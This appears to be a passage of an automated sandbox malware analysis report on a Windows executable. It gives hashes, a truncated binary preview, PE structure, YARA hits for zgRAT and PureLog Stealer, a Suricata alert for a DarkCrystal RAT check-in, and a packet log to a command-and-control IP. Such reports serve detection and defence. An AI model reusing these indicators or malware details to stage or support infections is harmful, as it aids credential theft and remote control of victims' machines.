                                                          Process:C:\ProviderWebSavesNet\hostcrt.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3879424
                                                          Entropy (8bit):7.837347017475398
                                                          Encrypted:false
                                                          SSDEEP:98304:wxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8:wxmR4atrYsNdx3I5Xs
                                                          MD5:88340879F7B502B0EEE8F6147CDC70EB
                                                          SHA1:1510660A130FDCB57E2DCAD37C16CF1A966126D8
                                                          SHA-256:BCEFEDADA15B81B6470D80824651DAC64D52A568B459B6C1ADE8D0DCDDCF2F05
                                                          SHA-512:D3518EB922315743BF16624E256A6BCC4B930723786CF34CCB40AFB901C2EDE1A19C0ACDB21EE4C5BBDA6541A2B229C16A8AD66E861230E46634F30B8D3DB3ED
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Media\Characters\conhost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Media\Characters\conhost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Media\Characters\conhost.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Media\Characters\conhost.exe, Author: Joe Security
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................*;..........I;.. ...`;...@.. ........................;...........@.................................PI;.K....`;.p.....................;...................................................... ............... ..H............text....);.. ...*;................. ..`.rsrc...p....`;......,;.............@....reloc........;......0;.............@..B.................I;.....H.......8...|.......y........l0..H;......................................0..........(.... ........8........E....M...N.......)...8H...(.... ....~....{p...9....& ....8....(.... ....~....{....:....& ....8....*(.... ....8........0.......... ........8........E....................F...8........~....(T...~....(X... ....?u... ....~....{....:....& ....8....~....(L... .... .... ....s....~....(P....... ....~....{....:a...& ....8V...r...ps....z*~....:.... ....~....{....:,...& ....8!......

                                                          \Device\Null

                                                          Download File
                                                          Process:C:\Windows\System32\PING.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):502
                                                          Entropy (8bit):4.618543484589417
                                                          Encrypted:false
                                                          SSDEEP:12:PrS5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:gdUOAokItULVDv
                                                          MD5:4DBEFFEDC5A0C766CC738CB031B97382
                                                          SHA1:A28348DF32AE7C992201A7893DDCCE39638F5DB6
                                                          SHA-256:D1C202BA26D1A32C2060CF1231E5CDA0621E84DB3EE32985C7151E0A2E2D081F
                                                          SHA-512:ACE73ECFFCCF8775525BD45FDDE356AE95FD8ED293F079E10AC7ECD0575EB302EF96AF9297BEFEE017120659CC598C4F33272A3A052D1951574776234A127709
                                                          Malicious:false
                                                          Preview:..Pinging 571345 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.792866797225971
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:kIdT4m0aa4.exe
                                                          File size:4'201'265 bytes
                                                          MD5:55a2312d6062e5bac6c5f62a0ee42fa2
                                                          SHA1:2271954571874366b20b329f202735959361a01c
                                                          SHA256:bce94981e91d899f670e4aa9b06e51f1bbff4960751481b373c119c8373ed481
                                                          SHA512:f9ec8f21b68dcec5e9c8916e87a1395a84efbcac8aae67b0c8c171391ac301ea330d47fa352fdcf60db78a979e9e6c380a6ae9a526772878b5a46fc16d0c2ced
                                                          SSDEEP:98304:ylxy6buzFyyqatrjLQsf10YsOR+iI5XEcP8e:cxmR4atrYsNdx3I5Xse
                                                          TLSH:BE16F10665914E37C2AD3F3184E7142D42B0DB61BA13EF1B3E5F20E5B9562A0DF262B7
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                          File Icon

                                                          Icon Hash:1515d4d4442f2d2d

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F8D008D1F6Bh
                                                          jmp 00007F8D008D187Dh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007F8D008C46C7h
                                                          mov dword ptr [esi], 004356D0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 004356D8h
                                                          mov dword ptr [ecx], 004356D0h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 004356B8h
                                                          push eax
                                                          call 00007F8D008D4D0Fh
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx
                                                          je 00007F8D008D1A0Ch
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007F8D008D0FC9h
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F8D008C4642h
                                                          push 0043BEF0h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F8D008D47C9h
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007F8D008D1988h
                                                          push 0043C0F4h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007F8D008D47ACh
                                                          int3
                                                          jmp 00007F8D008D6247h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 00422900h
                                                          push dword ptr fs:[00000000h]

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                          PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                          RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                          RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                          RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                          RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                          RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                          RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                          RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                          RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                          RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                          RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                          RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                          RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                          RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                          RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                          RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                          RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                          RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                          RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                          RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                          RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                          RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                          RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                          RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                          RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                          RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-09-08T11:52:08.853157+02002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973880.211.144.15680TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 8, 2024 11:52:08.130862951 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:08.135735035 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:08.136590004 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:08.136590004 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:08.141448021 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:08.505341053 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:08.510349989 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:08.799870014 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:08.853157043 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:08.949632883 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:08.949985027 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:08.950150967 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.058798075 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.063911915 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.167565107 CEST4973980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.172641993 CEST804973980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.172827005 CEST4973980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.173141956 CEST4973980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.177953959 CEST804973980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.262919903 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.263114929 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.267947912 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.525137901 CEST4973980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.530107021 CEST804973980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.530123949 CEST804973980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.530138969 CEST804973980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.559273005 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.581399918 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.586333036 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.785677910 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.785870075 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.790754080 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.790800095 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.851191998 CEST804973980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:09.900024891 CEST4973980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:09.981803894 CEST804973980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.025022030 CEST4973980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:10.092758894 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.112602949 CEST4974180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:10.114743948 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:10.114845037 CEST4973980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:10.117433071 CEST804974180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.117499113 CEST4974180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:10.117616892 CEST4974180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:10.119836092 CEST804973880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.120102882 CEST4973880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:10.120284081 CEST804973980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.120354891 CEST4973980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:10.122354031 CEST804974180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.462630987 CEST4974180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:10.772975922 CEST804974180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.773000002 CEST804974180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.773279905 CEST804974180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.782573938 CEST804974180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:10.837533951 CEST4974180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:11.176301956 CEST804974180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:11.177464962 CEST4974180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:11.182563066 CEST804974180.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:11.182604074 CEST4974180192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:11.305654049 CEST4974280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:11.310475111 CEST804974280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:11.310539007 CEST4974280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:11.310686111 CEST4974280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:11.315378904 CEST804974280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:11.665771961 CEST4974280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:11.670809031 CEST804974280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:11.670825005 CEST804974280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:11.670839071 CEST804974280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:11.984271049 CEST804974280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:12.025015116 CEST4974280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:12.181865931 CEST804974280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:12.228208065 CEST4974280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:12.303641081 CEST4974480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:12.303641081 CEST4974280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:12.308576107 CEST804974480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:12.308691978 CEST4974480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:12.308772087 CEST804974280.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:12.308795929 CEST4974480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:12.309103966 CEST4974280192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:12.313550949 CEST804974480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:12.665771008 CEST4974480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:12.670715094 CEST804974480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:12.670722961 CEST804974480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:12.670736074 CEST804974480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:12.973934889 CEST804974480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:13.026321888 CEST4974480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:13.104924917 CEST804974480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:13.144388914 CEST4974480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:13.231997013 CEST4974480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:13.232877970 CEST4974680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:13.237185955 CEST804974480.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:13.237236977 CEST4974480192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:13.237658978 CEST804974680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:13.237726927 CEST4974680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:13.237826109 CEST4974680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:13.242630005 CEST804974680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:13.587671041 CEST4974680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:13.592581034 CEST804974680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:13.592595100 CEST804974680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:13.592607021 CEST804974680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:13.903029919 CEST804974680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:13.946902037 CEST4974680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:14.032896996 CEST804974680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:14.087548018 CEST4974680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:14.150806904 CEST4974680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:14.151706934 CEST4974780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:14.156567097 CEST804974780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:14.156624079 CEST804974680.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:14.156657934 CEST4974780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:14.156683922 CEST4974680192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:14.156831026 CEST4974780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:14.161567926 CEST804974780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:14.510838032 CEST4974780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:14.515825033 CEST804974780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:14.515837908 CEST804974780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:14.515850067 CEST804974780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:14.823719978 CEST804974780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:14.868767977 CEST4974780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.028212070 CEST804974780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.071909904 CEST4974780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.104335070 CEST4974780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.104736090 CEST4974880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.109570026 CEST804974880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.109625101 CEST804974780.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.109693050 CEST4974780192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.109709978 CEST4974880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.109888077 CEST4974880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.114646912 CEST804974880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.156902075 CEST4974980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.196297884 CEST4974880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.430805922 CEST804974980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.430879116 CEST4974980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.431118011 CEST4974980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.435883045 CEST804974980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.473882914 CEST804974880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.590471983 CEST804974880.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.590528011 CEST4974880192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.775325060 CEST4974980192.168.2.480.211.144.156
                                                          Sep 8, 2024 11:52:15.782058001 CEST804974980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.782083988 CEST804974980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:15.782094002 CEST804974980.211.144.156192.168.2.4
                                                          Sep 8, 2024 11:52:16.123929977 CEST804974980.211.144.156192.168.2.4
